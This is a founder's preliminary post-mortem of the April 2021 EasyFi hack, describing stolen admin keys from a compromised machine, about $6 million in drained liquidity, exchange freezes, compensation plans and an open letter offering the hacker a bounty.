EasyFi Security Incident. Pre-Post Mortem
This post will be updated as and when more information becomes available
Background
On Monday, 19th April at 10:40:26 AM +UTC, I was informed by teammates about large transfers of EASY tokens from EasyFi official wallets to some unknown wallets on the ethereum network and polygon network. These transactions quickly brought to my attention a possible compromise of admin keys or mnemonic keys since the machine used for the purpose was not in use for at least a week and was completely offline. Quickly, responding to the event I took all the necessary precautions and actions to curtail the losses.
Till the time I managed to get my hands on the computer, the hacker managed to get access to admin keys and remove existing liquidity to the tune of $6 million from protocol pools in USD / DAI / USDT and transfer 2.98 Million EASY tokens to this wallet address: 0x83a2EB63B6Cc296529468Afa85DbDe4A469d8B37 which is alleged to belong to the hacker.
This is a mnemonic key hack. The EasyFi smart contracts were not exploited and only mnemonic phrase/admin keys were compromised from the metamask under a planned remote attack which was used to drain liquidity from the protocol. The physical machine was not tampered with, and it seems to be the issue with some remote access as might have been previously used on Hugh Karp.
Targeted Attack
In what we believe is a targeted attack, we are investigating it thoroughly to arrive at a factual conclusion and act on it. Since the machine was not used for daily operations and is used solely for the purpose of official transfers. The hacker waited for the right time to execute the hack in a well-planned manner. We’ll update and share more information on this as it becomes available.
Summary
While most metamask attacks phish private keys / mnemonic phrases by tricking into downloading a malicious version, this is not the case here. My computer was compromised and metamask was altered from the disk.
My machine was compromised and we are working with experts to run full diagnostics. This remains a work in progress.
From the initial investigations, it looks like hackers are extremely sophisticated and quite likely working as part of a larger group. We are continuing our investigations and shall share more information as it becomes available.
To our community members
I would like to thank you for the support you have shown in this tough time. We are constantly working with our team & technical experts to bring about a plausible solution to make good the losses that happened from the hack. We cannot promise anything at this stage but rest assured we are working in the best interest of our community members. We value your support and urge you to keep patience for the next few days as we need time to collate data related to all the user accounts and come up with a strategy to compensate accordingly.
We have contacted Binance and AscendEx teams who have assisted us with suspending withdrawals/deposits of EASY tokens. The hacker has not actually moved the tokens from the wallet due to that and is not able to sell any significant amount on DEXes due to liquidity constraints.
Open Letter to the Hacker
You’ve used very sophisticated techniques to steal a lot of funds from the EasyFi community. EasyFi is a very new project which has received a lot of love & support from its users being the one of early movers on the layer 2 Polygon network.
We are still at a very early stage and not in a position to make good all the losses in a personal capacity. We care for our community and shall do everything possible at our end to make good all the losses that happened to our users from this theft. We are in great shock and, believe, so as our users who relied on & supported us since inception.
As the founder of the project, I would urge you to be thoughtful of the hard work gone into building EasyFi so far. I request you to consider returning all funds and discuss the possibility of an appropriate bounty to avoid all the legal trouble in the future. We can consider a clean payout to a white hacker worth 1M USD and not attempt any legal proceedings regarding this incident.
Ankitt
